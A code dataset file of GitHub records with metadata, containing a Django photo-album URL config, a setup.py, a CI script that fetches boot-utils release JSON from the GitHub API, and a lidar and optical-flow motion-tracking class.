+{"seq_id": "10739097396", "text": "from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.loginUser, name='login'),\n path('logout/', views.logoutUser, name='logout'),\n path('register/', views.registerUser, name='register'),\n # path('api/photos/', views.getPhotos, name=\"get-photos\"),\n\n path('gallary/', views.gallary, name= \"gallary\"),\n path('photo//', views.viewPhoto, name= \"photo\"),\n path('check', views.check, name=\"check\"),\n path('add/', views.addPhoto, name= \"addPhoto\"),\n path('category/', views.addCategory, name= \"addCategory\"),\n]", "repo_name": "thansoe-2000/photo-album", "sub_path": "myapp/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 575, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.urls.path", "line_number": 5, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 14, "usage_type": "call"}]}
+{"seq_id": "4039455961", "text": "from setuptools import setup, Distribution\n\n\nclass BinaryDistribution(Distribution):\n def is_pure(self):\n return False\n\n\nsetup(\n name='Coliform',\n version='0.7.5.1',\n description='Coliform UPRM Project Library, Written for Raspberry Pi',\n packages=['Coliform'],\n author='Osvaldo E Duran',\n author_email='osvaldo.duran@upr.edu',\n url='https://github.com/Regendor/coliform-project',\n classifiers=['Programming Language :: Python :: 3', 'Intended Audience :: Education',\n 'Intended Audience :: Science/Research',\n 'License :: OSI Approved :: GNU General Public License v3 (GPLv3)'],\n # install_requires=['Adafruit_TCS34725'],\n distclass=BinaryDistribution\n)\n", "repo_name": "uprm-research-resto/coliform-project", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 727, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "setuptools.Distribution", "line_number": 4, "usage_type": "name"}, {"api_name": "setuptools.setup", "line_number": 9, "usage_type": "call"}]}
+{"seq_id": "18903580958", "text": "#!/usr/bin/env python3\n# pylint: disable=invalid-name\n\nfrom argparse import ArgumentParser\nimport os\nfrom pathlib import Path\nimport subprocess\n\nif 'GITHUB_ACTIONS' in os.environ:\n repo = Path(os.environ['GITHUB_WORKSPACE'])\nelse:\n repo = Path(__file__).resolve().parents[1]\n\nparser = ArgumentParser(\n description='Download latest boot-utils release JSON from GitHub API')\nparser.add_argument('github_token', help='Value of GITHUB_TOKEN')\nargs = parser.parse_args()\n\ncurl_cmd = [\n 'curl', '--header', 'Accept: application/vnd.github+json', '--header',\n f\"Authorization: Bearer {args.github_token}\", '--output',\n Path(repo, 'boot-utils.json'), '--silent', '--show-error',\n 'https://api.github.com/repos/ClangBuiltLinux/boot-utils/releases/latest'\n]\nsubprocess.run(curl_cmd, check=True)\n", "repo_name": "ClangBuiltLinux/continuous-integration2", "sub_path": "scripts/generate-boot-utils-json.py", "file_name": "generate-boot-utils-json.py", "file_ext": "py", "file_size_in_byte": 806, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 14, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.environ", "line_number": 9, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 10, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 10, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 12, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 14, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 22, "usage_type": "call"}, {"api_name": "subprocess.run", "line_number": 25, "usage_type": "call"}]}
+{"seq_id": "8228202872", "text": "import numpy as np\r\nfrom scipy.spatial import distance\r\nimport cv2\r\nimport math\r\n\r\nimport image_preprocess as IMG\r\nimport time\r\n\r\nfrom Lidar_tools import edge_detect, polar_to_cartesian, interpolation, find_lidar_theta_phi_from_coord_Ma\r\nfrom Lidar_tools_AG import build_roatation_matrix_3D, coords_ro_move\r\n\r\n\r\n\r\nclass Move_esti:\r\n def __init__(self, Lidar_info, Camera_info):\r\n self.plot = 1\r\n self.initialized = 0\r\n self.v_sample = Camera_info['v_sample']\r\n self.h_sample = Camera_info['h_sample']\r\n self.focus = Camera_info['focus']\r\n self.y_sample = Lidar_info['y_sample']\r\n self.x_sample = Lidar_info['x_sample']\r\n self.x_sample_deg = Lidar_info['x_sample_deg']\r\n self.y_sample_deg = Lidar_info['y_sample_deg']\r\n self.upper_lim = Lidar_info['upper_lim']\r\n self.lidar_range = Lidar_info['lidar_range']\r\n\r\n\r\n self.depth_image_now = None\r\n self.depth_image_last = None\r\n self.dt_in_game = None\r\n self.magnitude_image = None\r\n self.direction_image = None\r\n self.mag_read = None\r\n self.direc_read = None\r\n\r\n self.reference_x = None\r\n self.reference_y = None\r\n\r\n self.m_candidate_coord_last = np.array([])\r\n self.m_candidate2_coord_last = np.array([])\r\n self.m_tracked_coord_last = np.array([])\r\n\r\n self.m_tracked_spd_last = np.array([])\r\n self.m_candidate_spd_last = np.array([])\r\n self.m_candidate2_spd_last = np.array([])\r\n\r\n self.s_candidate_coord_last = np.array([])\r\n self.s_candidate2_coord_last = np.array([])\r\n self.s_tracked_coord_last = np.array([])\r\n\r\n self.pitch = None\r\n self.delta_roll = None\r\n self.delta_pitch = None\r\n self.delta_yaw = None\r\n self.speed_now = None\r\n self.acc = None\r\n\r\n self.move_z = None\r\n self.move_x = None\r\n self.move_y = None\r\n self.depth_x_now = None\r\n self.depth_y_now = None\r\n self.depth_z_now = None\r\n self.row_image_now = None\r\n self.col_image_now = None\r\n\r\n self.ground_marker = None\r\n\r\n\r\n def input(self, ground_marker, magnitude_image, direction_image, depth_image, dt_in_game,\r\n pitch, delta_roll, delta_pitch, delta_yaw, speed_now, acc):\r\n\r\n self.depth_image_now = depth_image\r\n self.dt_in_game = dt_in_game\r\n self.magnitude_image = magnitude_image\r\n self.direction_image = direction_image\r\n\r\n\r\n self.pitch = pitch\r\n self.delta_roll = delta_roll\r\n self.delta_pitch = delta_pitch\r\n self.delta_yaw = delta_yaw\r\n self.speed_now = speed_now\r\n self.acc = acc\r\n\r\n self.ground_marker = ground_marker\r\n\r\n self.calculate_movement()\r\n\r\n\r\n def calculate_movement(self):\r\n # simple ver. only using the yaw to estimate, in camera coord: x,y,z refer to front, width, height\r\n dt_in_game = self.dt_in_game\r\n acc = self.acc\r\n speed_last = self.speed_now - acc * dt_in_game\r\n\r\n if self.delta_yaw != 0:\r\n # simple ver. 
only using the yaw to estimate, in camera coord: x,y,z refer to left, up, front\r\n horizontal_turn_radius = (speed_last * dt_in_game + acc * dt_in_game ** 2 / 2) / self.delta_yaw\r\n self.move_z = horizontal_turn_radius * math.sin(self.delta_yaw) * math.cos(self.pitch)\r\n self.move_x = horizontal_turn_radius * (1 - math.cos(self.delta_yaw))\r\n self.move_y = (speed_last * dt_in_game + acc * dt_in_game ** 2 / 2) * math.sin(self.pitch)\r\n else:\r\n self.move_z = (speed_last * dt_in_game + acc * dt_in_game ** 2 / 2) * math.cos(self.pitch)\r\n self.move_x = 0\r\n self.move_y = (speed_last * dt_in_game + acc * dt_in_game ** 2 / 2) * math.sin(self.pitch)\r\n\r\n\r\n\r\n def run(self):\r\n if self.initialized == 0:\r\n if self.depth_image_now is not None:\r\n self.initialized = 1\r\n self.depth_image_last = self.depth_image_now\r\n return None, None, None, None, None, None, None, None, None\r\n\r\n\r\n\r\n y_sample = self.y_sample\r\n x_sample = self.x_sample\r\n y_sample_deg = self.y_sample_deg\r\n x_sample_deg = self.x_sample_deg\r\n upper_lim = self.upper_lim\r\n depth_image_now = self.depth_image_now\r\n depth_image_last = self.depth_image_last\r\n lidar_range = self.lidar_range\r\n focus = self.focus\r\n h_sample = self.h_sample\r\n v_sample = self.v_sample\r\n dt_in_game = self.dt_in_game\r\n\r\n ground_marker = self.ground_marker\r\n\r\n m_candidate_coord_last = self.m_candidate_coord_last\r\n m_candidate2_coord_last = self.m_candidate2_coord_last\r\n m_tracked_coord_last = self.m_tracked_coord_last\r\n\r\n m_tracked_spd_last = self.m_tracked_spd_last\r\n m_candidate_spd_last = self.m_candidate_spd_last\r\n m_candidate2_spd_last = self.m_candidate2_spd_last\r\n\r\n s_candidate_coord_last = self.s_candidate_coord_last\r\n s_candidate2_coord_last = self.s_candidate2_coord_last\r\n s_tracked_coord_last = self.s_tracked_coord_last\r\n\r\n ### main calculation starts here\r\n edge_y, edge_x = edge_detect(depth_image_last)\r\n\r\n row_lidar, col_lidar = (np.indices((y_sample, x_sample))).astype('float32')\r\n\r\n # find lidar theta phi\r\n theta, phi = find_lidar_theta_phi_from_coord_Ma(row_lidar, col_lidar, x_sample, x_sample_deg, y_sample_deg,\r\n upper_lim)\r\n\r\n # polar to cartesian camera coord\r\n depth_x, depth_y, depth_z = polar_to_cartesian(depth_image_now, theta, phi)\r\n\r\n # cartesian to image coord\r\n reference_y = (v_sample - 1) / 2 - depth_y * focus / depth_z\r\n reference_x = (h_sample - 1) / 2 - depth_x * focus / depth_z\r\n\r\n # read optical flow to find where the last positions were\r\n magnitude = self.magnitude_image[np.round(reference_y).astype(int), np.round(reference_x).astype(int)]\r\n direction = self.direction_image[np.round(reference_y).astype(int), np.round(reference_x).astype(int)]\r\n\r\n # use more samples to read optical flow\r\n #magnitude = (self.magnitude_image[np.round(reference_y).astype(int), np.round(reference_x).astype(int)] +\r\n # self.magnitude_image[np.round(reference_y).astype(int), np.round(reference_x).astype(int)+1] +\r\n # self.magnitude_image[np.round(reference_y).astype(int)+1, np.round(reference_x).astype(int)] +\r\n # self.magnitude_image[np.round(reference_y).astype(int)+1, np.round(reference_x).astype(int)+1]) / 4\r\n#\r\n #direction = (self.direction_image[np.round(reference_y).astype(int), np.round(reference_x).astype(int)] +\r\n # self.direction_image[np.round(reference_y).astype(int), np.round(reference_x).astype(int)+1] +\r\n # self.direction_image[np.round(reference_y).astype(int)+1, np.round(reference_x).astype(int)] +\r\n # 
self.direction_image[np.round(reference_y).astype(int)+1, np.round(reference_x).astype(int)+1]) / 4\r\n\r\n extend_row = magnitude * np.sin(direction / 180 * np.pi)\r\n extend_col = magnitude * np.cos(direction / 180 * np.pi)\r\n\r\n row_image_last = reference_y - extend_row # row and col not rounded yet\r\n col_image_last = reference_x - extend_col\r\n\r\n # for check_flow(), debug\r\n self.depth_x_now = depth_x\r\n self.depth_y_now = depth_y\r\n self.depth_z_now = depth_z\r\n self.row_image_now = reference_y\r\n self.col_image_now = reference_x\r\n self.mag_read = magnitude\r\n self.direc_read = direction\r\n\r\n # find lidar theta phi from those positions in image\r\n pixel_v_refer2center = row_image_last - v_sample // 2 + 0.5 # -: above, +: under\r\n pixel_h_refer2center = h_sample // 2 - col_image_last - 0.5 # +: left, -: right\r\n\r\n theta_last = np.arctan(pixel_v_refer2center / np.sqrt(focus ** 2 + pixel_h_refer2center ** 2)) + np.pi / 2\r\n phi_last = np.arctan(pixel_h_refer2center / focus)\r\n\r\n\r\n # find possible nearest upper left lidar point from phi and theta, this is one of the vertices for interpolation\r\n row_lidar_up_raw = ((theta_last / np.pi * 180 - upper_lim) // y_sample_deg).astype(int)\r\n\r\n col_lidar_left_raw = np.zeros_like(col_lidar)\r\n col_lidar_left_raw = np.where(phi_last / np.pi * 180 >= x_sample_deg / 2, # left\r\n x_sample // 2 - (phi_last / np.pi * 180 - x_sample_deg / 2) // x_sample_deg - 2,\r\n col_lidar_left_raw)\r\n\r\n col_lidar_left_raw = np.where(phi_last / np.pi * 180 <= -x_sample_deg / 2, # right\r\n x_sample // 2 + (-phi_last / np.pi * 180 - x_sample_deg / 2) // x_sample_deg,\r\n col_lidar_left_raw)\r\n\r\n col_lidar_left_raw = np.where((phi_last / np.pi * 180 < x_sample_deg / 2) &\r\n (phi_last / np.pi * 180 > -x_sample_deg / 2), # near center\r\n x_sample // 2 - 1,\r\n col_lidar_left_raw)\r\n col_lidar_left_raw = col_lidar_left_raw.astype(int)\r\n\r\n # change those points which are out of lidar FOV into correct range. 
Their results can't be trusted.\r\n        # All points will be interpolated due to matrix calculation, but results from bad points will be excluded later\r\n        row_lidar_up = np.where(row_lidar_up_raw < 0, 0, row_lidar_up_raw)\r\n        row_lidar_up = np.where(row_lidar_up + 1 > y_sample - 1, y_sample - 2, row_lidar_up)\r\n        col_lidar_left = np.where(col_lidar_left_raw < 0, 0, col_lidar_left_raw)\r\n        col_lidar_left = np.where(col_lidar_left + 1 > x_sample - 1, x_sample - 2, col_lidar_left)\r\n\r\n        # the other vertices for interpolation\r\n        row_lidar_down = row_lidar_up + 1\r\n        col_lidar_right = col_lidar_left + 1\r\n\r\n        # read the depth of each vertex\r\n        depth_ul = depth_image_last[row_lidar_up, col_lidar_left]\r\n        depth_ur = depth_image_last[row_lidar_up, col_lidar_right]\r\n        depth_dl = depth_image_last[row_lidar_down, col_lidar_left]\r\n        depth_dr = depth_image_last[row_lidar_down, col_lidar_right]\r\n\r\n        # interpolation\r\n        theta_last_up, phi_last_left = \\\r\n            find_lidar_theta_phi_from_coord_Ma(row_lidar_up, col_lidar_left, x_sample, x_sample_deg, y_sample_deg,\r\n                                               upper_lim)\r\n        theta_last_down, phi_last_right = \\\r\n            find_lidar_theta_phi_from_coord_Ma(row_lidar_down, col_lidar_right, x_sample, x_sample_deg, y_sample_deg,\r\n                                               upper_lim)\r\n\r\n        depth_inter_u, sensitivity_up = interpolation(phi_last_left, phi_last, phi_last_right, depth_ul, depth_ur)\r\n        depth_inter_d, sensitivity_down = interpolation(phi_last_left, phi_last, phi_last_right, depth_dl, depth_dr)\r\n\r\n        depth_inter, sensitivity_center = interpolation(theta_last_up, theta_last, theta_last_down, depth_inter_u,\r\n                                                        depth_inter_d)\r\n\r\n        # to cartesian\r\n        depth_x_last, depth_y_last, depth_z_last = polar_to_cartesian(depth_inter, theta_last, phi_last)\r\n\r\n        # build the indices of good points\r\n        obj_check1 = edge_x[row_lidar_up, col_lidar_left] * edge_x[row_lidar_up, col_lidar_right]\r\n        obj_check2 = edge_x[row_lidar_down, col_lidar_left] * edge_x[row_lidar_down, col_lidar_right]\r\n        obj_check3 = edge_y[row_lidar_up, col_lidar_left] * edge_y[row_lidar_down, col_lidar_left]\r\n        obj_check4 = edge_y[row_lidar_up, col_lidar_right] * edge_y[row_lidar_down, col_lidar_right]\r\n\r\n        depth_check1 = depth_image_last[row_lidar_up, col_lidar_left]\r\n        depth_check2 = depth_image_last[row_lidar_up, col_lidar_right]\r\n        depth_check3 = depth_image_last[row_lidar_down, col_lidar_left]\r\n        depth_check4 = depth_image_last[row_lidar_down, col_lidar_right]\r\n\r\n        index_good_points = np.where((depth_image_now < lidar_range) & # current points inside lidar range\r\n                                     # current point is not ground\r\n                                     (ground_marker == 0) &\r\n                                     # 4 raw vertices inside lidar FOV\r\n                                     (row_lidar_up_raw >= 0) &\r\n                                     (row_lidar_up_raw + 1 <= y_sample - 1) &\r\n                                     (col_lidar_left_raw >= 0) &\r\n                                     (col_lidar_left_raw + 1 <= x_sample - 1) &\r\n                                     # 4 raw vertices located on the same surface of an object\r\n                                     (obj_check1 > -1) & (obj_check2 > -1) & (obj_check3 > -1) & (obj_check4 > -1) &\r\n                                     # 4 raw vertices inside lidar range\r\n                                     (depth_check1 < lidar_range) & (depth_check2 < lidar_range) &\r\n                                     (depth_check3 < lidar_range) & (depth_check4 < lidar_range))\r\n\r\n        # take out those good points.\r\n        depth_x_last = np.expand_dims(depth_x_last[index_good_points], axis=1)\r\n        depth_y_last = np.expand_dims(depth_y_last[index_good_points], axis=1)\r\n        depth_z_last = np.expand_dims(depth_z_last[index_good_points], axis=1)\r\n        points_last = np.concatenate((depth_x_last, depth_y_last, depth_z_last), axis=1) # refer to camera coord last\r\n\r\n        depth_x = np.expand_dims(depth_x[index_good_points], axis=1)\r\n        
depth_y = np.expand_dims(depth_y[index_good_points], axis=1)\r\n        depth_z = np.expand_dims(depth_z[index_good_points], axis=1)\r\n        points_now = np.concatenate((depth_x, depth_y, depth_z), axis=1) # refer to camera coord now\r\n        # (the camera coord itself moves in the world coord)\r\n        # change the coord system from time last to time now by using the self movement,\r\n        # i.e. points_last then refers to the current camera coord\r\n        move_matrix = np.array([self.move_x, self.move_y, self.move_z])\r\n        rotation_matrix_p_r, rotation_matrix_y = build_roatation_matrix_3D(self.delta_pitch, self.delta_roll,\r\n                                                                           self.delta_yaw)\r\n\r\n        points_last_new_coord = coords_ro_move(points_last, move_matrix, rotation_matrix_p_r, rotation_matrix_y,\r\n                                               mode='move_first')\r\n\r\n        # speed relative to ground in current camera coord\r\n        spd_xyz = (points_now - points_last_new_coord) / dt_in_game\r\n        spd_mag = np.sqrt(np.sum(spd_xyz ** 2, axis=1))\r\n\r\n        # build a unified sensitivity (of interpolation) matrix\r\n        sensitivity_up = np.expand_dims(sensitivity_up, axis=2)\r\n        sensitivity_down = np.expand_dims(sensitivity_down, axis=2)\r\n        sensitivity_center = np.expand_dims(sensitivity_center, axis=2)\r\n        sensitivity = np.concatenate((sensitivity_up, sensitivity_down, sensitivity_center), axis=2)\r\n\r\n        # adaptive thresholds:\r\n        # m for detecting moving points,\r\n        # s for detecting stationary points,\r\n        # t for tracking those points from the last point cloud\r\n        threshold_m = depth_image_last * 0.05 + np.max(sensitivity, axis=2) * 0.95 # spd threshold\r\n        threshold_s = threshold_m / 1 # spd threshold\r\n        threshold_m_t = depth_image_last * 0.015 + np.max(sensitivity, axis=2) * 0.05 # position threshold\r\n        threshold_s_t = depth_image_last * 0.015 + np.max(sensitivity, axis=2) * 0.05 # position threshold\r\n        threshold_m_t_spd = 1 + depth_image_last * 0.05 # + np.max(sensitivity, axis=2) * 0.95 # spd threshold\r\n\r\n        threshold_m = threshold_m[index_good_points]\r\n        threshold_s = threshold_s[index_good_points]\r\n        threshold_m_t = threshold_m_t[index_good_points]\r\n        threshold_m_t_spd = threshold_m_t_spd[index_good_points]\r\n        threshold_s_t = threshold_s_t[index_good_points]\r\n\r\n        # take out the stationary points' current and last positions, referred to the last camera coord\r\n        stationary_index = np.where(spd_mag < threshold_s)\r\n        s_points_now = points_now[stationary_index]\r\n        s_points_last = points_last[stationary_index]\r\n        threshold_s_t = threshold_s_t[stationary_index]\r\n        lack = spd_mag - threshold_s\r\n        t0 = time.time()\r\n        # pairwise distance of each point in s_points_last to each point in the last classified clouds (in camera coord last)\r\n        spl_to_st = threshold_s_t + 1\r\n        spl_to_sc2 = threshold_s_t + 1\r\n        spl_to_sc = threshold_s_t + 1\r\n\r\n        if s_tracked_coord_last.size != 0:\r\n            spl_to_st = distance.cdist(s_points_last, s_tracked_coord_last, 'euclidean')\r\n            # min. 
distance of each point in s_points_last to the last classified clouds\r\n            spl_to_st = np.min(spl_to_st, axis=1)\r\n\r\n        if s_candidate2_coord_last.size != 0:\r\n            spl_to_sc2 = distance.cdist(s_points_last, s_candidate2_coord_last, 'euclidean')\r\n            spl_to_sc2 = np.min(spl_to_sc2, axis=1)\r\n\r\n        if s_candidate_coord_last.size != 0:\r\n            spl_to_sc = distance.cdist(s_points_last, s_candidate_coord_last, 'euclidean')\r\n            spl_to_sc = np.min(spl_to_sc, axis=1)\r\n\r\n        # classify the current stationary points (s_points_now) into 3 groups\r\n        # below, use boolean indexing instead of np.where for simplicity\r\n        # s_tracked_index = np.where((spl_to_st < threshold_s_t) | (spl_to_sc2 < threshold_s_t))\r\n        s_tracked_index = (spl_to_st < threshold_s_t) | (spl_to_sc2 < threshold_s_t)\r\n        s_tracked_coord = s_points_now[s_tracked_index,:]\r\n\r\n        #s_rest_index = np.where((spl_to_st >= threshold_s_t) & (spl_to_sc2 >= threshold_s_t))\r\n        s_rest_index = ~s_tracked_index\r\n        s_points_now_rest = s_points_now[s_rest_index,:]\r\n        spl_to_sc_rest = spl_to_sc[s_rest_index]\r\n        threshold_s_t = threshold_s_t[s_rest_index]\r\n\r\n        # s_candidate2_index = np.where(spl_to_sc_rest < threshold_s_t)\r\n        s_candidate2_index = (spl_to_sc_rest < threshold_s_t)\r\n        s_candidate2_coord = s_points_now_rest[s_candidate2_index,:]\r\n\r\n        #s_candidate_index = np.where(spl_to_sc_rest >= threshold_s_t)\r\n        s_candidate_index = ~s_candidate2_index\r\n        s_candidate_coord = s_points_now_rest[s_candidate_index,:]\r\n\r\n        ## below for moving points\r\n        # take out the moving points' current and last positions, referred to the last camera coord\r\n        moving_index = np.where(spd_mag > threshold_m)\r\n        m_points_now = points_now[moving_index]\r\n        m_spd_xyz = spd_xyz[moving_index]\r\n        m_points_last = points_last[moving_index]\r\n        threshold_m_t = threshold_m_t[moving_index]\r\n        threshold_m_t_spd = threshold_m_t_spd[moving_index]\r\n        excess = spd_mag - threshold_m\r\n\r\n        # rotate the last speeds into the current coord, so they can be compared with the current speeds\r\n        move_matrix = np.array([0,0,0])\r\n        m_tracked_spd_last = coords_ro_move(m_tracked_spd_last, move_matrix, rotation_matrix_p_r, rotation_matrix_y,\r\n                                            mode='move_first')\r\n        m_candidate2_spd_last = coords_ro_move(m_candidate2_spd_last, move_matrix, rotation_matrix_p_r, rotation_matrix_y,\r\n                                               mode='move_first')\r\n        m_candidate_spd_last = coords_ro_move(m_candidate_spd_last, move_matrix, rotation_matrix_p_r, rotation_matrix_y,\r\n                                              mode='move_first')\r\n\r\n        # pairwise distance of each point in m_points_last/m_spd_xyz to each point in the last classified clouds (in camera coord last)\r\n        # unlike the tracking of stationary points, speed is also checked for moving points, so the pipeline below differs slightly\r\n        threshold_m_t = np.expand_dims(threshold_m_t, axis=1)\r\n        threshold_m_t_spd = np.expand_dims(threshold_m_t_spd, axis=1)\r\n        mpl_to_mt = threshold_m_t + 1\r\n        mpl_to_mc2 = threshold_m_t + 1\r\n        mpl_to_mc = threshold_m_t + 1\r\n        mps_to_mt = threshold_m_t_spd + 1\r\n        mps_to_mc2 = threshold_m_t_spd + 1\r\n        mps_to_mc = threshold_m_t_spd + 1\r\n\r\n        if m_tracked_coord_last.size != 0:\r\n            mpl_to_mt = distance.cdist(m_points_last, m_tracked_coord_last, 'euclidean')\r\n            mps_to_mt = distance.cdist(m_spd_xyz, m_tracked_spd_last, 'euclidean')\r\n\r\n        if m_candidate2_coord_last.size != 0:\r\n            mpl_to_mc2 = distance.cdist(m_points_last, m_candidate2_coord_last, 'euclidean')\r\n            mps_to_mc2 = distance.cdist(m_spd_xyz, m_candidate2_spd_last, 'euclidean')\r\n\r\n        if m_candidate_coord_last.size != 0:\r\n            mpl_to_mc = distance.cdist(m_points_last, 
m_candidate_coord_last, 'euclidean')\r\n            mps_to_mc = distance.cdist(m_spd_xyz, m_candidate_spd_last, 'euclidean')\r\n\r\n        # classify the current moving points (m_points_now) into 3 groups\r\n        m_tracked_index1 = (mpl_to_mt < threshold_m_t) & (mps_to_mt < threshold_m_t_spd)\r\n        m_tracked_index1 = np.max(m_tracked_index1, axis=1)\r\n        m_tracked_index2 = (mpl_to_mc2 < threshold_m_t) & (mps_to_mc2 < threshold_m_t_spd)\r\n        m_tracked_index2 = np.max(m_tracked_index2, axis=1)\r\n        m_tracked_index = m_tracked_index1 | m_tracked_index2\r\n\r\n        m_tracked_coord = m_points_now[m_tracked_index,:]\r\n        m_tracked_spd = m_spd_xyz[m_tracked_index,:]\r\n\r\n        m_rest_index = ~m_tracked_index\r\n        m_points_now_rest = m_points_now[m_rest_index,:]\r\n        m_spd_xyz_rest = m_spd_xyz[m_rest_index,:]\r\n        mpl_to_mc_rest = mpl_to_mc[m_rest_index]\r\n        mps_to_mc_rest = mps_to_mc[m_rest_index]\r\n        threshold_m_t = threshold_m_t[m_rest_index,:]\r\n        threshold_m_t_spd = threshold_m_t_spd[m_rest_index,:]\r\n\r\n        m_candidate2_index = (mpl_to_mc_rest < threshold_m_t) & (mps_to_mc_rest < threshold_m_t_spd)\r\n        m_candidate2_index = np.max(m_candidate2_index, axis=1)\r\n        m_candidate2_coord = m_points_now_rest[m_candidate2_index,:]\r\n        m_candidate2_spd = m_spd_xyz_rest[m_candidate2_index,:]\r\n\r\n        m_candidate_index = ~m_candidate2_index\r\n        m_candidate_coord = m_points_now_rest[m_candidate_index,:]\r\n        m_candidate_spd = m_spd_xyz_rest[m_candidate_index,:]\r\n        print('tracking takes', time.time() - t0)\r\n        # add markers to show on the image\r\n        marker = None\r\n        if self.plot != 0:\r\n            row = np.expand_dims(reference_y[index_good_points], axis=1)\r\n            col = np.expand_dims(reference_x[index_good_points], axis=1)\r\n            reference = np.concatenate((col, row), axis=1)\r\n\r\n            s_reference = reference[stationary_index]\r\n            marker_s_tracked = s_reference[s_tracked_index]\r\n            s_reference_rest = s_reference[s_rest_index]\r\n\r\n            marker_s_candidate2 = s_reference_rest[s_candidate2_index]\r\n            marker_s_candidate = s_reference_rest[s_candidate_index]\r\n\r\n            m_reference = reference[moving_index]\r\n            marker_m_tracked = m_reference[m_tracked_index]\r\n            m_reference_rest = m_reference[m_rest_index]\r\n\r\n            marker_m_candidate2 = m_reference_rest[m_candidate2_index]\r\n            marker_m_candidate = m_reference_rest[m_candidate_index]\r\n\r\n            marker = {'marker_tracked': np.array(marker_m_tracked),\r\n                      'marker_candidate2': np.array(marker_m_candidate2),\r\n                      'marker_candidate': np.array(marker_m_candidate),\r\n                      'marker_s_tracked': np.array(marker_s_tracked),\r\n                      'marker_s_candidate2': np.array(marker_s_candidate2),\r\n                      'marker_s_candidate': np.array(marker_s_candidate)}\r\n\r\n        esti_coord = None\r\n        # add more data\r\n        if self.plot == 2:\r\n            s_tracked_coord_e = s_points_last[s_tracked_index]\r\n            m_tracked_coord_e = m_points_last[m_tracked_index]\r\n\r\n            move_matrix = np.array([-self.move_x, -self.move_y, -self.move_z])\r\n            rotation_matrix_p_r, rotation_matrix_y = build_roatation_matrix_3D(-self.delta_pitch, -self.delta_roll, -self.delta_yaw)\r\n            points_last0 = coords_ro_move(points_now, move_matrix, rotation_matrix_p_r, rotation_matrix_y, mode='turn_first')\r\n\r\n            s_points_last0 = points_last0[np.where(stationary_index)]\r\n            m_points_last0 = points_last0[np.where(moving_index)]\r\n\r\n            s_tracked_coord_e0 = s_points_last0[s_tracked_index]\r\n            m_tracked_coord_e0 = m_points_last0[m_tracked_index]\r\n\r\n            esti_coord = {'tracked_coord_e': np.array(m_tracked_coord_e),\r\n                          'tracked_coord_e0': np.array(m_tracked_coord_e0),\r\n                          's_tracked_coord_e': np.array(s_tracked_coord_e),\r\n                          
's_tracked_coord_e0': np.array(s_tracked_coord_e0)}\r\n\r\n self.m_tracked_coord_last = m_tracked_coord\r\n self.m_tracked_spd_last = m_tracked_spd\r\n self.m_candidate_coord_last = m_candidate_coord\r\n self.m_candidate_spd_last = m_candidate_spd\r\n self.m_candidate2_coord_last = m_candidate2_coord\r\n self.m_candidate2_spd_last = m_candidate2_spd\r\n\r\n self.s_tracked_coord_last = s_tracked_coord\r\n self.s_candidate_coord_last = s_candidate_coord\r\n self.s_candidate2_coord_last = s_candidate2_coord\r\n\r\n\r\n self.depth_image_last = self.depth_image_now\r\n\r\n # return the current data actually\r\n return m_tracked_spd, self.m_tracked_coord_last, self.s_tracked_coord_last, excess, lack, \\\r\n reference_y, reference_x, marker, esti_coord\r\n\r\n\r\n\r\n # debug function\r\n def check_flow(self):\r\n move_matrix = np.array([-self.move_x, -self.move_y, -self.move_z])\r\n rotation_matrix_p_r, rotation_matrix_y = build_roatation_matrix_3D(-self.delta_pitch, -self.delta_roll,\r\n -self.delta_yaw)\r\n\r\n depth_x = np.expand_dims(self.depth_x_now, axis=2)\r\n depth_y = np.expand_dims(self.depth_y_now, axis=2)\r\n depth_z = np.expand_dims(self.depth_z_now, axis=2)\r\n all_point_now = np.concatenate((depth_x,depth_y,depth_z), axis=2).reshape(-1,3)\r\n all_points_last_esti = coords_ro_move(all_point_now, move_matrix, rotation_matrix_p_r, rotation_matrix_y,\r\n mode='turn_first')\r\n\r\n depth_x_last = all_points_last_esti[:,0].reshape(self.y_sample, self.x_sample)\r\n depth_y_last = all_points_last_esti[:,1].reshape(self.y_sample, self.x_sample)\r\n depth_z_last = all_points_last_esti[:,2].reshape(self.y_sample, self.x_sample)\r\n # cartesian to image coord\r\n row_image_last0 = (self.v_sample - 1) / 2 - depth_y_last * self.focus / depth_z_last\r\n col_image_last0 = (self.h_sample - 1) / 2 - depth_x_last * self.focus / depth_z_last\r\n\r\n flow_y = self.row_image_now - row_image_last0\r\n flow_x = self.col_image_now - col_image_last0\r\n\r\n mag_esti = np.sqrt(flow_x ** 2 + flow_y ** 2)\r\n mag_esti[np.where(mag_esti == 0)] = 1\r\n direc_esti = np.where(flow_y >= 0,\r\n np.arccos(flow_x / mag_esti) / np.pi * 180,\r\n np.arccos(- flow_x / mag_esti) / np.pi * 180 + 180)\r\n\r\n\r\n gamma = 3\r\n hsv = np.zeros((self.y_sample, self.x_sample, 3))\r\n hsv[..., 1] = 255\r\n hsv[..., 0] = self.direc_read / 2\r\n hsv[..., 2] = cv2.normalize(self.mag_read, None, 0, 1, cv2.NORM_MINMAX)\r\n hsv[..., 2] = 255 * hsv[..., 2] ** (1 / gamma)\r\n hsv = np.uint8(hsv)\r\n image_flow_cut = cv2.cvtColor(hsv, cv2.COLOR_HSV2RGB)\r\n\r\n hsv_0 = np.zeros((mag_esti.shape[0], mag_esti.shape[1], 3))\r\n hsv_0[..., 1] = 255\r\n hsv_0[..., 0] = direc_esti / 2\r\n hsv_0[..., 2] = cv2.normalize(mag_esti, 